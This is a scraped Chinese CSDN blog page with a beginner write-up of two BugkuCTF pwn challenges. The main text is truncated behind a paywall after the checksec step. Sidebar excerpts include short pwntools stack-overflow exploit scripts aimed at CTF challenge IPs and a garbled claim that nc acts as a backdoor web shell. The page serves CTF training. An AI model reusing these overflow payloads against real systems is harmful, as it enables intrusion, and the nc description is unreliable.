BugkuCTF pwn题第一弹

最新推荐文章于 2024-05-20 08:15:00 发布
最新推荐文章于 2024-05-20 08:15:00 发布
阅读量2.1k 收藏 12
点赞数 3
分类专栏: 刷题笔记 文章标签: pwn学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43489686/article/details/100578503
版权
本文介绍了BugkuCTF的两道PWN题目,包括PWN1的基础破解方法和PWN2的栈溢出利用。在PWN2中,通过checksec发现64位程序,利用栈溢出找到get_shell_函数地址,计算偏移量,最终实现漏洞利用。作者反思自身在pwn学习中的不足,强调理解堆栈和编写脚本的重要性,表示将以此博客作为学习成长的起点。
摘要由CSDN通过智能技术生成

PWN1

在这里插入图片描述
这题没什么好说的,直接nc连接,然后ls获取文件目录,然后猫flag就可以得到flag了。

需要注意的是因为这题是新手入坑题,所以直接把flag放在flag文件下,一般情况下不排除其他文件有flag。

槽一句,虽然这题简单到不行,但是我也是看了别人的博客之后才发现自己有多无知,这么基础的东西都不会。
在这里插入图片描述

PWN2

在这里插入图片描述
这道题是有给文件的,那么我们先把文件下载下来分别保存到Ubuntu和主机。

首先我们尝试一下故技重施,nc一下看看会怎么样。
在这里插入图片描述
发现被这个程序嘲讽了,显然这题不是那么简单可以做的。这个时候我们就要用上我们下载好的工具了。
首先在Linux终端上checksec一下这个程序。

最低0.47元/天 解锁文章
冯小妖
关注
  • 3
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
BugkuCTF-PWNcanary超详细讲解
am_03的博客
08-31 2258
知识点 小端序说明,数据在内存里是如何存储的?下表里数据都为16进制 解流程 目Hint:更新 LibcSeacher 的 libc-database checksec查看保护机制 0x28=40 0x10=16 0x29=41 0x300=768 0x2C=44 buf长度为48,而read读取长度为768 v5长度为520,而read读取长度为768 所以存在栈溢出漏洞 from pwn import * #sh = process('./pwn4_') #context.log_lev
BugkuCTF pwn pwn1
H4ppyD0g的博客
08-17 1267
1 pwn1 ubuntu下输入 nc 114.116.54.89 10001 然后ls查看该目录下文件,发现有flag文件, cat flag 获取flag。 nc 主机的ip或域名端口号 作用是建立于对应ip或端口的链接,相当于一个后门web shell,可以进行访问等操作。 nc的作用还有很多,这里只是最简单的应用。 ...
PWN基础入门-1-3:bugku-瑞士军刀
最新发布
weixin_49765221的博客
05-20 325
nc连接后,直接cat flag就可以了。
BugkuCTF pwn
像初雪一样自由洒落
04-02 539
唉,觉得自己TCL,栈溢出知识点差不多都会了,可是目做不出来啊啊啊啊!缺少锻炼吧,这两天把BugkuCTF上面的pwn做一下吧。。。 pwn1 只给了连接 第一次,才50分,想来不会太难,连上去 果然,连接就能拿flag ...
bugku ctf pwn1 (nc 114.116.54.89 10001)
qq_42777804的博客
06-17 1万+
nc 114.116.54.89 10001 在Linux里面运行 nc 114.116.54.89 10001 ( nc命令用于设置路由器。) 之后用 ls -l 命令 (ls命令用于显示指定工作目录下之内容(列出目前工作目录所含之文件及子目录)。) (-l 除文件名称外,亦将文件型态、权限、拥有者、文件大小等资讯详细列出) 发现flag 使用命令 :...
BugkuCtf-pwn2-exp
weixin_30340745的博客
08-22 380
#!/usr/bin/env python from pwn import * p = process('./pwn2') payload = 'a' * 56 + p64(0x400751) p.recvuntil('?') p.sendline(payload) print p.recvall() 转载于:https://www.cnblo...
bugku ctf misc wp2.pdf
07-05
bugku ctf misc wp2.pdf
bugku pwnlibc
11-06
bugku pwnlibc,pwn3做时可在里面查找system、binsh等
ctf库ctf-pwn收集
03-31
CTF(夺旗赛)库是一个由安全专家和爱好者们制作的一系列网络安全挑战。这些挑战旨在测试各种安全技能,包括密码学、逆向工程、漏洞利用和网络分析等。 CTF库通常由多个类别的挑战组成,例如Web安全、二进制反...
CTF PWN 武器库
12-12
"CTF PWN 武器库"通常指的是这类竞赛中的一个问,挑战者需要利用编程技巧来解决安全漏洞,获取系统的控制权。在这个特定的案例中,我们面对的目是"rifle",它涉及到fastbin堆溢出,这是一种常见的内存管理漏洞...
安恒ctf pwn课件
10-06
安恒培训资料 栈溢出指的是程序向栈中某个局部变量中写入的字节数超过了这个变量本身所申 请的字节数,因而导致与其相邻的栈中的变量的值被改变。 Ø 程序能够向栈上写入数据。 Ø 写入的数据大小没有被良好地控制。...
pwn栈溢出10道练习有writeup
01-04
pwn栈溢出练习目,每都有writeup.
[Bugku CTF——Pwn] pwn4
Y_peak的博客
03-22 514
[Bugku CTF——Pwn] pwn4 目地址:https://ctf.bugku.com/ 给的提示很清楚,绕过canary保护 那就绕过就好 目当中有system函数 利用ROPgadget就好 思路 将canary低位的 ‘\x00’ 给覆盖掉, 就可以利用 %s 将其输出, leek出来 exploit from pwn import * #p = process('./pwn4_') p = remote('114.67.246.176',15541) pop_rdi = 0x00
bugku pwn2
doudoudedi
06-04 1694
这道是一道简单的栈溢出 直接用IDA查看 很明显的得到flag的函数 直接上exp from pwn import * p=remote('114.116.54.89',10003) p.recvuntil('something?') payload='a'*56+p64(0x400751) p.sendline(payload) p.interactive() ...
【BUUCTF - PWNpwn1_sctf_2016
古月浪子的博客
03-19 4203
checksec一下 找到漏洞函数,s的长度为0x3c,而我们只能输入32个字符,不足以栈溢出,但是发现replace函数会把输入的 I 替换成 you,这样的话输入20个 I 就能填满s 找到后门函数 from pwn import * from LibcSearcher import * context.os='linux' context.arch='i386' context.lo...
Bugku PWN Easy_int
JEWSWS的博客
04-01 366
【春风不解语,独做狮子吟。】
CTFpwn总结 入门
热门推荐
九层台
04-26 2万+
学了那么久pwn了,基础知识终于积累的差不多了,来这个总结希望其他学pwn的人能少走一些弯路。 0x01学pwn需要哪些知识呢? 堆栈是少不了的。要知道函数调用的时候,栈中的数据是怎么放的,知道ebp在哪,知道返回地址在哪。 能看懂汇编,2条指令要清楚,ret和call。 具备这些基础知识你就能够开始学pwn了。 0x02需要注意什么 在溢出是要清楚2个...
BugkuCTF pwn1 pwn2 pwn4 pwn5 pwn3 详细writeup【橘小白】
kety_gz的博客
09-03 9213
buku的pwn按照难度的顺序依次是pwn1,pwn2,pwn4,pwn5,pwn3 这些目的libc pwn1 nc连接后直接就有执行权限 ls cat flag 得到flag pwn2 下载文件放入ida 有一个有shell,我们只需要将程序跳转到这里 选择main F5查看代码 看到这个s申请了0x30个字节,但是下边read了0x100字节,就造成了栈溢出,我们只要将返回地址溢出为...
BugKu做记录【pwn】(持续更新中)
Assassin
04-06 3253
文章目录repeater1.目分析2.我的错误思路3.正确思路4.利用代码5.知识点总结 好久不做了,刚刚开始的签到就做了三天,感觉水平确实下降得太厉害了,恢复训练~ ** ** repeater 1.目分析 目逻辑非常简单,就是read函数输入内容,然后printf输出,经过观察和简单得调试,我们需要注意到几个内容 pinrtf存在格式化字符串漏洞 read长度为0x64,不足以造成栈溢出 经过权限查询发现开启了NX保护,RELRO是部分开启,也就是堆栈不可执行 经过查看,bss段不可执
ctf pwn怎么生成64位的shellcode
03-25
4. 将生成的十六进制字符串作为shellcode的一部分,以便在pwn中使用。 需要注意的是,在编写64位shellcode时,需要考虑到64位CPU的特点,如使用RAX寄存器来传递参数,使用SYSV调用约定等。同时,在编写任何...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值